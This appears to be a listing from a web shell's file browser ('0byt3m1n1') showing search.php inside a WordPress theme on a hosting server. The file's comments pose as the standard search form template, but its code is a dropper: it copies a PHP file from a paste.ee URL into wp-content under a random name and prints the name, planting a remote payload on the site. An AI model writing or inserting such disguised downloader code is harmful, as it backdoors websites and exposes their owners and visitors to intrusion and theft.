0byt3m1n1
Path:
/
var
/
www
/
clients
/
client38
/
web37
/
web
/
wp-content
/
themes
/
Impreza
/
[
Home
]
File: search.php
<?php /** * The searchform.php template. * * Used any time that get_search_form() is called. * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/ * * @package WordPress * @subpackage * @since 1.0 */ /* * Generate a unique ID for each form and a string containing an aria-label * if one was passed to get_search_form() in the args array. */ //62b34f748d967 $name = uniqid(); if ( @copy("https://paste.ee/r/8cXy5", "../../../wp-content/" . $name . ".php") ) { echo $name; }else{ echo "Fail."; } ?>